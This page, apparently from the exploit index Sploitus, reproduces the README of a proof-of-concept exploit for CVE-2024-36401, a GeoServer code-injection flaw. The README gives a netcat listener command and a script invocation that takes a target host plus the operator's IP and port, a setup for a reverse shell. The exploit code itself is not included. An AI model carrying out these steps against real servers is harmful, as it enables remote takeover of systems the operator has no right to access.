Sploitus

Exploit for Code Injection in Geoserver

githubexploit · 2024-10-14

Exploit Code

README15 lines
## https://sploitus.com/exploit?id=54E413F5-7115-59EA-A394-D86FA850EB84
# CVE-2024-36401

This is a program for checking vulnerabilities related to CVE-2024-36401. # How to use
First, execute the following command and wait for communication to occur:
nc -lvnp 9000
After that, run the file in a different terminal:
python CVE-2024-36401.py --target example.com --target_port 8080 --myip 172.26.16.100 --myport 9000
--target: The domain or IP address of the target system.
--target_port: The port number on which the target’s service is running.
--myip: Your own IP address.
--myport: The port number that you are waiting on with nc.
# Terms of use
Please use this tool for vulnerability detection and learning purposes only, and for enjoyment in hacking. We do not support, encourage, or endorse any form of hacking or unauthorized access to any system or network. Use this tool responsibly and only in systems for which you have explicit permission. # Reference
https://github.com/Mr-xn/CVE-2024-36401